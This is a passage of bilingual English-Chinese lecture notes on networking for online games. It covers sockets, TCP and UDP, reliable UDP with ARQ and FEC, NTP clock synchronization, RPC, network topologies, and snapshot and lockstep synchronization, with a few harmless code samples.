
      高并发性

    • High Availability

      高可用性

    • High Performance

      高性能

    Network Protocols

    网络协议

    The Founding Fathers of the Internet

    互联网的创始人(一开始用于军事用途)

    Designed the TCP/lP protocols andthe internet architecture.

    设计了 TCP/IP 协议和互联网架构。

    In 1977 Cerf and Kahn will link three networks (packet radio, satellite, and the ARPANET) and prove the efficacy of their TCP/lP protocol in a dramatic round-the-world transmission from a moving vehicle, the SRl Packet RadioResearch van.

    1977 年,Cerf 和 Kahn 将连接三个网络(分组无线电、卫星和 ARPANET),并证明他们的 TCP/lP 协议在移动车辆 SRl 分组无线电研究车的戏剧性环球传输中的有效性。

    How to communication between two PCs

    • A and B must agree on the meaning of the bits being sent and received at many different levels, including

      A 和 B 必须就在许多不同级别发送和接收的比特的含义达成一致,包括

      • How many volts represents a 0 bit, and for a 1 bit?

        多少伏特代表 0 位,多少伏特代表 1 位?

      • How does receiver know which is the last bit?

        接收器如何知道哪个是最后一位?

      • How many bits long is a number?

        一个数字有多少位长?

    webp

    The Problem of Communication

    沟通问题

    webp

    • Re-implement every application for every new underlying transmission medium?

      为每个新的底层传输介质重新实施每个应用程序

    • Change every application on any change to an underlying transmission medium?

      在更改基础传输介质时更改每个应用程序

    • No! But how does the Internet design avoid this?

      不!但是,互联网设计是如何避免这种情况的呢?

    Solution: Layering

    解决方法:分层

    webp

    • Intermediate layers provide a set of abstractions for applications and media

      中间为应用程序和媒体提供了一组抽象

    • New applications or media only need implementation for intermediate layer’s interface

      新的应用程序或媒体只需要实现中间层的接口

    Layering in the internet - OSI Model

    互联网分层——OSI 模型

    Application 应用层

    • Provides functions to users 为用户提供功能

    Presentation 表示层

    • Converts different representations 转换不同的表示形式

    Session 会话层

    • Manages task dialogs 管理任务对话框

    Transport 传输层

    • Provides end-to-end delivery 提供端到端交付

    Network 网络层

    • Sends packets over multiple links 通过多个链路发送数据包

    Data Link 数据链路层

    • Sends frames of information 发送信息帧

    Physical 物理层

    • Sends bits as signals 以信号形式发送比特

    webp

    Network Socket-based Communication

    基于网络套接字的通信

    webp

    Socket

    套接字

    A software structure within a network node of a computer network that serves as an endpoint for sending and receiving data across the network.

    计算机网络的网络节点内的软件结构,用作通过网络发送和接收数据的端点。

    A Socket is combination of an lP Address and a Port Number.

    Socket 是 IP 地址和端口号的组合。

    webp

    // server side
    struct sockaddr_in saddr, caddr;
    int sockfd, clen, isock;
    unsigned short port = 80;

    if ((sockfd=Socket(AF INET,SOCK STREAM,0) < 0) {
    printf("Error creating socket\n");
    ...
    }

    memset(&saddr, '\0', sizeof(saddr)); // zero structure out
    saddr.sin family = AF INET; // match the socket() call
    saddr.sin addr.s addr = htonl(INADDR ANY); // bind to any local addresss
    addr.sin port = htons(port); // specify port to listen on

    if((bind(sockfd, (struct sockaddr *)&saddr, sizeof(saddr)) < 8) { // bind
    printf("Error binding\n");
    ...
    }

    if(listen(sockfd, 5) < 0) { // listen for incoming connections
    printf("Error listening\n");
    ...
    }

    clen=sizeof(caddr)
    if((isock=accept(sockfd, (struct sockaddr *)&caddr, &clen)) < 8) { // accept one
    printf("Error accepting\n");
    ...
    }

    Setup Socket

    安装套接字

    Both client and server need to setup the socket

    客户端和服务器都需要设置套接字

    • Function
      int socket(int domain, int type, int protocol)

      • domain

        • AF_INET – IPV4

        • AF_INET6 – IPV6

        • type

          • SOCK_STREAM – TCP

          • SOCK_DGRAM – UDP

        • protocol

          • 0
      • E0
        int sockfd = socket(AF_INET, SOCK_STREAM, 0)

    Transmission Control Protocol (TCP)

    传输控制协议(TCP)

    • Connection-Oriented

      面向连接

    • Reliable and Ordered

      可靠且有序

    • Flow Control

      流量控制

    • Congestion Control

      拥堵控制

    webp

    TCP Retransmission Mechanisms

    TCP 重传机制

    Duplicate ACKs

    重复 ACK

    • Senders sends packets and seqnos

      发送方发送数据包和序列号

      • 1,2, 3, 4, 5, 6, 7, 8
    • Assume 5th packet (seqno 5) is lost, Streamof ACKs will be

      假设第 5 个数据包(序列号 5)丢失,则 ACK 流将

      • 1, 2, 3, 4, 4, 4, 4

    webp

    TCP congestion control

    TCP 拥塞控制

    • The congestion window (CWND) of TCP starts to grow from a small value

      TCP 的拥塞窗口(CWND)从一个小值开始增长

    • When congestion occurs, packet loss or timeout, CWND will be reduced according to a certain algorithm

      当发生拥塞、丢包或超时时,CWND 将根据特定算法减少

    • This leads to high delay and cause delay jitter

      这会导致高延迟并导致延迟抖动

    webp

    As the main transmission protocol on the lnternet, TCP congestion control is necessary, otherwise it will cause congestion collapse. TCP congestion control is the main congestion control measure on the Internet, and it is also the main cause of TCP performance problems.

    作为互联网上的主要传输协议,TCP 拥塞控制是必要的,否则会导致拥塞崩溃。TCP 拥塞控制是互联网上主要的拥塞控制措施,也是 TCP 性能问题的主要原因。

    User Datagram Protocol (UDP)

    用户数据报协议(UDP)

    David P. Reed

    He was involved in the early developmentof TCP/lP, and was the designer of the User Datagram Protocol (UDP), thoughhe finds this title “a little embarrassing”.

    他参与了 TCP/lP 的早期开发,是**用户数据报协议(UDP)**的设计者,尽管他觉得这个头衔“有点尴尬”。

    He was also one of the authors of theoriginal paper about the end-to-end principle, End-to-end arguments insystem design, published in 1984.

    他也是 1984 年发表的关于端到端原理系统设计中的端到端论证的原始论文的作者之一。

    UDP Features

    UDP 功能

    UDP (User Datagram Protocol)

    UDP(用户数据报协议)

    • Connectionless

      无连接

    • UnReliable and Unordered

      不可靠和无序

    • NO Flow Control

      无流量控制

    • NO Congerstion Control

      无堵塞控制

    webp

    Network Protocols Usage in Game

    Game suitable for use

    • TCP

      炉石

    • UDP

      守望先锋、CSGO

    TCPUDP
    Structure
    结构
    Segments
    部分
    Datagrams
    数据报
    Connection Model
    连接模型
    Connection-Oriented
    面向连接的
    Connectionless
    无连接的
    Speed
    速度
    Slow
    Fast
    Reliability
    可靠性
    Reliable
    可靠
    Unreliable
    不可靠
    Header
    标头
    20 Bytes
    8 Bytes
    Data Transfer
    数据传输
    Ordered
    有序的
    Unordered
    无序的
    Control
    控制
    Flow Control
    流量控制
    NO Flow Control
    无流量控制

    Reliable UDP

    可靠 UDP,在 UDP 的基础上加以改进。

    TCP is Not Time Critical

    TCP 不重视及时性

    • TCP is the complex and heavyweight protocol. lt provides reliable delivery and advanced features, but it has more overhead.

      TCP 是复杂而重量级的协议。它提供可靠的交付和高级功能,但开销更大。

    • TCP is a fair, traffic oriented protocol designed to improve bandwidth utilization. But it’s not designed for speed.

      TCP 是一种公平的、面向流量的协议,旨在提高带宽利用率。但它不是为速度而设计的。

    • So Why TCP is slow?

      为什么 TCP 很慢?

    UDP is Fast but Unreliable

    UDP 速度快但不可靠

    • UDP is lightweight and fast but unreliable, packet loss and disorder will occur.

      UDP 是轻量级和快速的,但不可靠,会发生数据包丢失和混乱。

    • How to achieve reliable and real-time communication?

      如何实现可靠和实时的通信?

    Why We Need to Customize Protocol

    为什么我们需要定制协议

    • Game Server

      游戏服务器

      • Keep-alived connection (TCP)

        保持有效连接(TCP)

      • Need keep logic consistency in “order” (TCP)

        需要保持“顺序”(TCP)中的逻辑一致性

      • High responsive & low latency (UDP)

        高响应和低延迟(UDP)

      • Broadcast commonly used (UDP)

        常用广播(UDP)

    • Web Server

      Web 服务器

      • Handles the HTTP protocol

        处理 HTTP 协议

      • Delivers static web content e.g., HTML pages, files, images, video.

        提供静态网络内容,例如 HTML 页面、文件、图像、视频。

    Acknowledgement & Sequence Number

    确认和序列号

    • Positive acknowledgment (ACK) is a signal that is passed between communicating processes, computers, or devices to signify acknowledgment, or receipt of message

      **肯定应答(ACK)**是在通信进程、计算机或设备之间传递的信号,表示确认或收到消息

    • Negative ACK (NACK or NAK) is a signal that is sent to reject a previously receivedmessage or to indicate some kind of error

      **否定 ACK(NACK 或 NAK)**是一种信号,用于拒绝之前接收到的消息或指示某种错误

    • Sequence number (SEQ) is a counter used to keep track of every byte sent outward bya host

      **序列号(SEQ)**是一个计数器,用于跟踪主机向外发送的每个字节

    • Timeouts specified periods of time allowed to elapse before an acknowledgment is tobe received

      超时在收到确认之前允许经过的特定时间段

    Automatic Repeat Request (ARQ)

    自动重复请求(ARQ)

    An error-control method for data transmission that uses ACK and timeouts to achieve reliable data transmission over an unreliable communication channel.

    一种用于数据传输的错误控制方法,该方法使用 ACK 和超时来在不可靠的通信信道上实现可靠的数据传输。

    If the sender does not receive an acknowledgment before the timeout, it re-transmits thepacket until it receives an acknowledgment or exceeds a predefined number of retransmissions.

    如果发送方在超时之前没有收到确认,它会重新发送数据包,直到收到确认或超过预定义的重新传输次数。

    • Sliding window protocol

      滑动窗口协议

      • Stop-and-Wait ARQ

        停止并等待 ARQ

      • Go-Back-N ARQ

      • Selective Repeat ARQ

        选择性重复 ARQ

    Sliding Window Protocol

    滑动窗口协议

    • Send mutilple frames at a time, number of frames to be sent is based on Window size

      一次发送多个帧,要发送的帧数基于窗口大小

    • Each frame is numbered by Sequence number

      每帧按序列号编号

    • When the frame at the front of the window is received, the window slides

      当收到窗户前部的框架时,窗户会滑动

    webp

    webp

    Stop-and-Wait ARQ

    停止并等待 ARQ

    • Windows size = 1

      窗口大小 = 1

    • After transmitting one frame, the sender waits for an ACK before transmitting the next frame

      发送一帧后,发送方在发送下一帧之前等待 ACK

    • If the ACK does not arrive after a certain time, the sender times out and retransmits the original frame

      如果 ACK 在特定时间后未到达,则发送方超时并重新传输原始帧

    • Poor utilization of bandwidth, poor performance

      带宽利用率低,性能差

    webp

    Go-Back-N ARQ

    • N is Sender’s Windows Size

      N 是发件人的窗口大小

    • The Receiver only sends cumulative ACK

      接收器仅发送累积 ACK

    • If an ACK is not received within an agreed-upon time period, all frames in the current window are transmitted

      如果在商定的时间段内未收到 ACK,则传输当前窗口中的所有帧

    webp

    Selective Repeat ARQ

    选择性重复 ARQ

    • In Selective Repeat ARQ, only the damaged or lost frames are retransmitted

      在选择性重复 ARQ 中,只有损坏或丢失的帧会被重新传输

    • The receiver sends the ack of each frame, and the sender maintains the timeout time of each frame

      接收方发送每帧的 ack,发送方保持每帧的超时时间

    • When receiver receive damaged packet, it willsend a NACK, The sender will send/retransmitframe for which NACK is received

      当接收方收到损坏的数据包时,它将发送一个 NACK。发送方将发送/重新发送收到 NACK 的帧

    webp

    Make UDP Reliable in Packet Loss Scenario

    在丢包情况下使 UDP 可靠

    With the increase of packet loss rate and delay, the reliable UDP can not meet the transmission requirements gradually.eg. lf packet loss rate increase to 20%, use reliable UDP is still with high delay.

    随着丢包率和延迟的增加,可靠的 UDP 逐渐无法满足传输要求。例如,如果丢包率增加到 20%,使用可靠的 UDP 仍然具有高延迟。

    webp

    Forward Error Correction (FEC)

    前向纠错(FEC)

    • The transmission of enough additiona, redundant information with the primary data stream to reconstruct lost lP packets up to a certain extent

      与主数据流一起传输足够的附加、冗余信息,以在一定程度上重建丢失的 IP 数据包

    webp

    XOR-FEC

    ABA XOR B
    000
    011
    101
    110
    Law 律Desc 描述
    Law of identity 同一律A xor 0 = A
    Zeroing law 零律A xor A = 0
    Commutative law 交换律A xor B = B xor A
    Associative law 结合律A xor (B xor C) = (A xor B) xor C

    C = A xor B

    A = A xor (B xor B) = (A xor B) xor B = C xor B

    B = (A xor A) xor B = A xor C

    • There are four packets A, B, C, D
      • Let E = XOR (A, B, C, D)
      • A = XOR (B, C, D, E)
      • B = XOR (A, C, D, E)
      • C = XOR (A, B, D, E)
      • D = XOR (A, B, C, E)

    webp

    If any packet is lost, it can be recovered with the other four packets.

    如果任何一个数据包丢失,可以用其他四个数据包恢复。

    Only one packet can be lost in continuous data. lf $A$ and $B$ are lost at the same time, the algorithm cannot recover.

    连续数据中只能丢失一个数据包。如果 $A$ 和 $B$ 同时丢失,则算法无法恢复。

    Reed-Solomon Codes

    里德-所罗门码

    There are $N$ valid data, and $M$ FEC data are expected to be generated

    有 $N$ 个有效数据,预计将生成 $M$ 个 FEC 数据

    • Form $N$ valid data into a unit vector $D$

      将 $N$ 个有效数据转换为单位向量 $D$

    • Generate a transformation matrix $B$: it is composed of a $N$-order identity matrix and a $N * M$ Vandemode matrix (The matrix composed of any n rows of
      matrix $B$ is reversible)

      生成一个变换矩阵 $B$:它由一个 $N$ 阶恒等式矩阵和一个 $N * M$ Vandemode 矩阵组成(该矩阵由以下任意 $N$ 行组成矩阵 $B$ 是可逆的)

    • The matrix $G$ obtained by multiplying the matrix $B$ and Vector $D$ contains $M$ redundant FEC data

      通过将矩阵带向量 $D$ 相乘获得的矩阵 $G$ 包含 $M$ 个冗余 FEC 数据

    webp

    Assume $D1$, $D4$, $C2$ are lost

    假设 $D1$、$D4$、$C2$ 丢失

    • The $B$ matrix also needs to delete the corresponding $M$ rows to obtain a deformation matrix of $B’$

      $B$ 矩阵还需要删除相应的 $M$ 行,以获得 $B’$ 的变形矩阵

    webp

    • Inverse matrix $B’$ get $B^{-1}$

      逆矩阵 $B’$ 得到 $B^{-1}$

    • Multiply $B’^{-1}$ on both sides to recover the original data

      将两侧的 $B’^{-1}$ 相乘以恢复原始数据

    webp

    Customize Your UDP based on ARQ and FEC

    基于 ARQ 和 FEC 自定义 UDP

    Reliability

    可靠性

    • Use Selective Repeat ARQ

      使用选择性重复 ARQ

    Hybrid ARQ and FEC

    混合 ARQ 和 FEC

    • Before ARQ, FEC is used for error correction

      在 ARQ 之前,FEC 用于纠错

    Real-time

    实时

    • Smaller RTO growth

      RTO 增长较小

    • No congestion control

      无拥堵控制

    • Fast retransmission mechanism

      快速重传机制

    • No delay ACK

      无延迟确认

    Flexibility

    灵活性

    • Design protocol for speed

      速度设计协议

    • Support both reliable and unreliable transmission

      支持可靠和不可靠的传输

    Clock Synchronization

    时钟同步

    RTT

    Round-Trip Time

    往返时间

    • Send/Recv delay

      发送/接收延迟

    • Propagation delay

      传播延迟

    • Response time of the origin server

      源服务器的响应时间

    RTT vs. Ping

    • Ping tests are usually performed within a transport protocol that uses lCMP packets

      Ping 测试通常在使用 lCMP 数据包的传输协议中执行

    • RTT is measured at the application layer

      RTT 在应用层进行测量

    RTT vs. Latency

    • Latency is the time required for a data packet to travel from the sending endpoint to the receivingend point (only one trip)

      延迟是数据包从发送端点传输到接收点所需的时间(仅一次行程)

    webp

    Network Time Protocol (NTP)

    网络时间协议(NTP)

    Network lime Protocol is an internet protocol used tosynchronize with computer clock time sources in a network.

    网络时间协议是一种用于与网络中的计算机时钟时间源同步的互联网协议。

    • Reference clock

      参考时钟

      • GPS clock or radio ransmiiting station

        GPS 时钟或无线电传输站

      • Amazinglly precise timekeeping devices such as atomic clocks

        令人惊叹的精确计时设备,如原子钟

      • Not connected to the internet

        未连接到互联网

      • Send their time through radio or optical fiber

        通过无线电或光纤发送他们的时间

    Time Server Stratums

    时间服务器层

    Stratum Values

    • Degrees of separation from the reference clock

      与参考时钟的分离程度

    • Reference clock has stratum value of 0

      参考时钟的层值为 0

    • Servers with stratum value 1 is called primary time servers

      层值为 1 的服务器称为主时间服务器

    • If a device’s stratum value is over 15, its time is not trustworthy

      如果设备的层值超过 15,则其时间不可信

    • Device will choose server with less stratum value automatically when correcting time

      设备在校正时间时会自动选择层值较小的服务器

    webp

    NTP Algorithm

    NTP 算法

    Use NTP is quite simple, just like this

    使用 NTP 非常简单,就像这样

    • Client ask time server for time

      客户端向时间服务器请求时间

    • Server receives the request and reply

      服务器接收请求和回复

    • Client receives the reply

      客户端收到回复

    But we have to do something with the Delay!

    但我们必须对延迟做点什么!

    webp

    We recordes 4 timestamps as $t^c_0, t^s_1, t^s_2, t^c_3$

    webp

    $\mathrm{Round\ Trip\ Delay}=(tc_3-tc_0)-(ts_2-ts_1)$

    $\mathrm{Offset}=\frac{(ts_1-tc_0+ts_2-tc_3)}{2}$

    The implicit assumption that the one way delay is statistically half the roundtrip delay

    单向延迟在统计上是往返延迟的一半的隐含假设

    Local-clock correction is computed from the offset data by.

    根据偏移数据计算本地时钟校正。

    • $t^c_3 + \mathrm{Offset}$

    *The delay and clock-offset samples obtained can be filtered using maximum-likelihood technigues

    *获得的延迟和时钟偏移样本可以使用最大似然技术进行滤波

    Let’s take an example:

    让我们举一个例子:

    It’s 17:01:00 on the client

    • $t^c_0$ is 17:01:00
    • $t^s_1$ is 17:01:32
    • $t^s_2$ is 17:01:33
    • $t^c_3$ is 17:01:05

    It’s 17:01:30 on the server

    (17:01:30)

    (17:01:32)

    (17:01:33)

    (17:01:35)

    $\mathrm{Round\ Trip\ Delay}=(tc_3-tc_0)-(ts_2-ts_1)$

    $\mathrm{Offset}=\frac{(ts_1-tc_0+ts_2-tc_3)}{2}$


    Round Trip Delay = (05 - 00) - (33 - 32) = 4s

    Offset = (32 - 00 + 33 - 05) / 2 = 30s

    So at $t^c_3$ client’s time is corrected to:

    • $t^c_3 + \mathrm{Offset}= 17:01:35$

    Stream-Based Time Synchronization with Elimination of Higher Order Modes

    基于流的时间同步,消除高阶模式

    1. Client stamps current local time on a “time request” packet and sends to server

    ​客户端在“时间请求”数据包上标记当前本地时间并发送到服务器

    2. Upon receipt by server, server stamps server-time and returns

    ​服务器收到后,服务器标记服务器时间并返回

    3. Upon receipt by client, a time delta is calculated by delta = (current Time-sent Time) / 2

    ​客户端收到后,通过 delta=(当前发送时间)/2 计算时间增量

    So far this algorithm is very like to NTP

    到目前为止,该算法与 NTP 非常相似

    4. The first result should immediately be used toupdate the clock

    ​第一个结果应立即用于更新时钟

    5. The client repeats Steps 1-3 (NTP-like process), five or more times

    ​客户端重复步骤1-3(类似 NTP 的过程)五次或更多次

    6. The results of the packet receipts are accumulatedand sorted in ascending order by latency

    ​数据包接收的结果按延迟升序累积和排序

    7. All samples above that are approximately 1.5 times the median are discarded, and the remaining samples are averaged using an arithmetic mean

    ​丢弃上述约为中位数 1.5 倍的所有样本,并使用算术平均值对剩余样本进行平均

    webp

    Remote Procedure Call (RPc)

    远程过程调用(RPC)

    Socket Programming: Still not Great

    Socket 编程:仍然不太好

    • Lots for the programmer to deal with every time

      程序员每次都要处理很多事情

      • How to separate different requests on the same connection?

        如何在同一连接上分离不同的请求?

      • How to write bytes to the network/read bytes from the network?

        如何向网络写入字节/从网络读取字节?

      • What if Host A’s process is written in Go and Host B’s process is in C++?

        如果主机 A 的进程是用 Go 编写的,而主机 B 的进程是 C++ 编写的呢?

      • What to do with those bytes?

        如何处理这些字节?

    • Still pretty painful… have to worry a lot about the network

      仍然很痛苦…不得不非常担心网络

      • Have you received the message?

        你收到消息了吗?

    Communication with Messages

    消息通信

    webp

    Communication Way

    沟通方式

    Initially, people “hand-coded” messages to send requests and responses

    最初,人们“手工编码”消息以发送请求和响应

    • Message is a stream of bytes-“op codes” and operands

      消息是字节流-“操作码”和操作数

    Lots of drawbacks

    很多缺点

    • Need to worry about message format

      需要担心消息格式

    • Have to pack and unpack data from messages

      必须从消息中打包和解包数据

    • Servers have to decode messages and dispatch them to handlers

      服务器必须解码消息并将其分派给处理程序

    • Messages are often asynchronous

      消息通常是异步的

      • After sending one, what do you do until the response comes back?

        发送一个后,在收到回复之前,你会做什么?

    • Messages aren’t a natural programming mode

      消息不是一种自然的编程模式

    struct foomsg {
    uint32 _t len;
    };

    void send_foo(char *contents) {
    int msglen = sizeof(struct foomsg) + strlen(contents);
    char buf = malloc(msglen);
    struct foomsg *fm = (struct foomsg *)buf;
    fm->len = htonl(strlen(contents));
    memcpy(buf + sizeof(struct foomsg), contents, strlen(contents));
    write(outsock,buf, msglen);
    }

    More Challenges on Logic Communication

    逻辑通信面临更多挑战

    • For a remote procedure call, a remote machine may:

      对于远程过程调用,远程机器可以:

      • Run process written in a different language

        运行用其他语言编写的进程

      • Represent data types using different sizes

        使用不同大小表示数据类型

      • Use a different byte ordering (endianness)

        使用不同的字节顺序(字节序)

      • Represent floating point numbers differently

        以不同的方式表示浮点数

      • Have different data alignment requirements

        有不同的数据对齐要求

        e.g., 4-byte type begins only on 4-byte memory boundary

        例如,4 字节类型仅在 4 字节内存边界上开始

    Remote Procedure Call (RPC)

    远程过程调用(RPC)

    • RPC is a reguest-response protocol. An RPC is initiated by the cient, which sends a reguest message to a known remote server to execute a specified procedure with supplied parameters

      RPC 是一种规范的响应协议。RPC 由 cient 发起,它向已知的远程服务器发送一条规则消息,以使用提供的参数执行指定的过程

    • Goals

      目标

      • Ease of programming

        易于编程

      • Hide complexity

        隐藏复杂性

      • Familiar model for programmers (just make a function call)

        程序员熟悉的模型(只需进行函数调用)

    webp

    RPC example

    • Go language

    webp

    • Output

      Hello World

    Why RPC?

    为什么选择 RPC?

    • Goal: Easy-to-program network communication that makes client-server communication transparent

      目标:易于编程的网络通信,使客户端-服务器通信透明

      • Retains the “feel” of writing centralized code

        保留编写集中式代码的“感觉”

      • Programmers needn’t think about the network

        程序员不必考虑网络

      • Make communication appear like a local procedure call

        使通信看起来像本地过程调用

    • Don’t need to worry about serialization/deserialization for network

      无需担心网络的序列化/反序列化

    • Don’t need to worry about complexities of network

      无需担心网络的复杂性

    Interface Definition Language

    接口定义语言

    • A server defines the service interface using an interface definition language (lDL)

      服务器使用接口定义语言(lDL)定义服务接口

      The lDL specifies the names, parameters, and types for allclient-callable server procedures

      lDL 指定了所有客户端可调用服务器过程的名称、参数和类型

      • example: ASN.1 in the OSI reference model

        示例:OSI 参考模型中的 ASN.1

      • example: Protobuf (Google’s data interchange format)

        示例:Protobuf(谷歌的数据交换格式)

    //polyline.proto
    syntax ="proto2";

    message Point {
    required int32 x = 1;
    required int32 y = 2;
    optional string label = 3;
    }

    message Line {
    required Point start = 1;
    required Point end = 2;
    optional string label = 3;
    }

    message Polyline {
    repeated Point point = 1;
    optional string label = 2;
    }

    RPC Stubs

    • A client-side stub is a procedure that looks to the client as if it were a callable server procedure

      客户端存根是一个过程,它在客户端看起来就像是一个可调用的服务器过程

      • The client program thinks it’s invoking the server butit’s calling into the client-side stub

        客户端程序认为它正在调用服务器,但它正在调用客户端存根

    • Aserver-side stub looks like a caller to the server

      服务器端存根看起来像是服务器的调用者

      • The server program thinks it’s called by the client but it’s really called by the server-side stub

        服务器程序认为它是由客户端调用的,但实际上是由服务器端存根调用的

    • The stubs send messages to each other to make the RPC happen transparently

      存根相互发送消息,使 RPC 透明地发生

    webp

    Stub compiler

    • A “stub compiler” reads the IDL declarations and produces two stub procedures for each server procedure

      “存根编译器”读取 IDL 声明,并为每个服务器过程生成两个存根过程

      • The server programmer implements the service’s procedures and links them with the server-side stubs

        服务器程序员实现服务的过程,并将其与服务器端存根链接起来

      • The client programmer implements the client program and links it with the client-side stubs

        客户端程序员实现客户端程序并将其与客户端存根链接

      • The stubs manage all of the details of remote communication between client and server

        存根管理客户端和服务器之间远程通信的所有细节

    Real RPC Package vourney

    真实 RPC 包凭证

    webp

    Network Topology

    网络拓扑

    Original Peer-to-Peer (P2P)

    原始点对点(P2P)

    • Each client broadcasts game event to the al others

      每个客户端向其他客户端广播游戏事件

    • Robustness

      稳健性

    • Cheating is much easier

      作弊要容易得多

    • Synchronization is required among all nodesto maintain the consistency of the distributed game state

      所有节点之间需要同步,以保持分布式游戏状态的一致性

    webp

    P2P with Host Server

    P2P 与主机服务器(如 CS)

    • A player can act as “server”, known as host

      玩家可以充当“服务器”,即主机

    • If host disconnected, the game may end

      如果主机断开连接,游戏可能会结束

    • The host need to handle game actor that cannot be controled by players, such as bot

      主机需要处理玩家无法控制的游戏角色,如机器人

    webp

    P2P Games

    P2P 游戏

    • No rely on server

      不依赖服务器

    • Used in Lan commonly

      常用于局域网

    • The “Host”is basically in control of the sessions

      “主持人”基本上控制着会话

    • A limited number of players at once

      一次玩家数量有限

    webp

    Dedicated Server

    专用服务器

    • Authority

      权威机构

    • Simulate game world

      模拟游戏世界

    • Dispatch data to players

      向玩家发送数据

    • High performance requirements

      高性能要求

    webp

    P2P vs Dedicated Server

    P2P 与专用服务器

    P2PDedicated Server
    Pros1. Robustness
    稳健性
    2. Removes the “server issues” problem in multiplayer sessions.
    消除多人游戏会话中的“服务器问题”问题
    3. No extra cost on server
    服务器无需额外付费
    1. Easy to maintain as well as cheating avoidance
    易于维护,避免作弊
    2. Can handle massive game world
    可以处理大型游戏世界
    3. Responsiveness of the game is not relay on the network conditions of each individual client
    游戏的响应性并不取决于每个客户端的网络状况
    Cons1. Cheating is much easier
    作弊要容易得多
    2. Every player needs a decent network connection for game to function properly
    每个玩家都需要一个像样的网络连接,游戏才能正常运行
    3. Can only handle a limited number of players
    只能处理有限数量的玩家
    1. High cost on server
    服务器成本高
    2. Much more work on server side program
    在服务器端程序上还有更多的工作要做
    3. Single point of failure
    单点故障

    When RTT is too high

    RTT 过高时

    • When players are in different countries, far away, or when the network environment is complex

      当玩家身处不同的国家、遥远的地方,或者网络环境复杂时

    • Use dedicated line and edge gateway to reduce latency

      使用专用线路和边缘网关来减少延迟

    webp

    Game Synchronization

    游戏同步

    Single-Player Gaming

    Game Tick

    • Player inputs

      玩家输入

    • Convert to game commands

      转换为游戏命令

    • Game logic

      游戏逻辑

    • Game render

      游戏渲染

    For Player

    对于玩家

    • Player inputs

      玩家输入

    • Consistency in each other

      彼此的一致性

    webp

    Online Gaming

    在线游戏

    For Player

    对于玩家

    • Player inputs

      玩家输入

    • Consistency in each other

      彼此的一致性

    How to play together at different terminals?

    如何在不同的终端上一起玩?

    • Game commands

      游戏命令

    • Game Logic

      游戏逻辑

    webp

    Game Synchronization

    游戏同步

    To answer the demand for responsive strategies, the synchronization rule is designed to solve the delay and consistency of all destination.

    为了满足对响应策略的需求,设计了同步规则来解决所有目的地的延迟和一致性问题。

    Synchronization Methods

    同步方法

    webp

    Snapshot 快照Lockstep 锁步State Synchornization 状态同步
    QuakeHonor of Kings 王者荣耀Counter Strike 反恐精英

    Snapshot Synchronization

    快照同步

    webp

    • Client sends inputs to server

      客户端向服务器发送输入

    • Server simulates the game world

      服务器模拟游戏世界

    • Generates whole game statesnapshots

      生成整个游戏状态快照

    • Sends them down to clients

      将它们发送给客户

    • Client updates the display according to the snapshot

      客户端根据快照更新显示

    Snapshot Synchronization - Jitter and Hitches

    快照同步-抖动和挂接

    • Server tick rate is limited

      服务器时间速率有限

    • Performance

      性能

    • Bandwidth

      带宽

    Snapshot Interpolation

    快照插值

    • Not rendering immediately after snapshot recevied

      收到快照后不立即渲染

    • Keep an interpolation buffer

      保留插值缓冲区

    • Interpolation between the two delayed snapshots

      两个延迟快照之间的插值

    Delta Compression

    德尔塔压缩

    • Only sync snapshot delta to client

      仅将快照增量同步到客户端

    • Example Quake3

    webp

    Snapshot Synchorization

    快照同步

    • 60HZ

    • Max Bandwidth 4.5 mbps

      最大带宽 4.5mbps

    Delta Compression

    德尔塔压缩

    • 60HZ

    • Max Bandwidth 676 kbps

      最大带宽 676 kbps

    Synchronizing Snapshot

    正在同步快照

    • Client performance is wasted

      客户端性能被浪费

    • High server pressure

      服务器压力高

    • High data volume and high bandwidth requirements

      高数据量和高带宽要求

    • As games get more complex, snapshots get bigger

      随着游戏变得越来越复杂,快照也越来越大

    Lockstep Synchronization

    锁步同步

    Lockstep Origin

    锁步原点

    Lockstep synchronization, used in military simulation, is by far the simplest techique to ensure consistency

    用于军事模拟的锁步同步是迄今为止确保一致性的最简单技术。

    • Same Result

      相同的结果

    • Same time

      同一时间

    • Same action

      同样的行动

    No member is allowed to advance its simulation clock until all others members have acknowledged that they are done.

    在所有其他成员确认完成之前,任何成员都不允许提前其模拟时钟。

    webp

    In particular, it is clear that a totally ordered delivery is a sufficient condition to ensure game state consistency across different nodes, as it guarantees that all generated events are reliably delivered according to the same unique order.

    特别是,很明显,完全有序的交付是确保不同节点之间游戏状态一致性的充分条件,因为它保证了所有生成的事件都按照相同的唯一顺序可靠地交付。

    Lockstep in Online Game

    网络游戏中的锁步

    Lockstep Principle.

    锁步原理。

    webp

    First Game Used Lockstep

    第一个游戏使用锁步

    • The network synchronization methodof DOOM (1994) was pointed out in a 2006 paper

      2006 年的一篇论文指出了 DOOM(1994)的网络同步方法

    • Lockstep is not mentioned in the paper, but it is now generally accepted that Doom (1994) was the first multiplayer FPS online game to use this type of synchronization

      论文中没有提到锁步,但现在人们普遍认为《毁灭战士》(1994)是第一款使用这种同步的多人 FPS 在线游戏

    • It uses P2P architecture

      它使用 P2P 架构

    webp

    Lockstep initialization

    锁步初始化

    Loading…

    加载…

    • Ensure that the initial data of each client is deterministic

      确保每个客户端的初始数据是确定的

      • Game model

        游戏模型

      • Static data

        静态数据

    • Synchronize clock

      同步时钟

    Deterministic Lockstep

    确定性锁步

    • Client sends inputs to Server

      客户端向服务器发送输入

    • Server receives and sorts

      服务器接收和排序

    • Wait for input from all clients before forwarding

      转发前等待所有客户端的输入

    • After receiving data from the server, the client executes the game logic

      在从服务器接收到数据后,客户端执行游戏逻辑

    webp

    If Player B’s message B2 arrives later? (The dotted line B2 in the figure)

    如果玩家 B 的消息 B2 稍后到达?(图中虚线 B2)

    • Disadvantages

      缺点

      • Game progress depends on slowest player

        游戏进度取决于最慢的玩家

      • The delay of the game is notfixed, the experience is not good

        游戏的延迟不是固定的,体验不好

      • All the players will wait if a player offline

        如果有玩家离线,所有玩家都会等待

    webp

    Player Offline in Deterministic Lockstep

    确定性锁步中的玩家离线

    Waiting for players…

    正在等待玩家…

    webp

    Bucket Synchronization

    Bucket 同步

    • Bucket: a fixed time period

      Bucket:固定时间段

    • Each bucket

      每个水桶

      • Colect all instructions

        整理所有说明

      • Broadcast to all players

        向所有玩家广播

    • There is no need to wait for all players’ commands to be received before forwarding

      转发前无需等待收到所有玩家的命令

    webp

    A Good Trade-off between Consistency and Interactivity Maintenance

    一致性和交互性维护之间的良好权衡

    So we need to find a basis balance between them.

    因此,我们需要在它们之间找到一个基本的平衡点。

    The threshold:

    阈值:

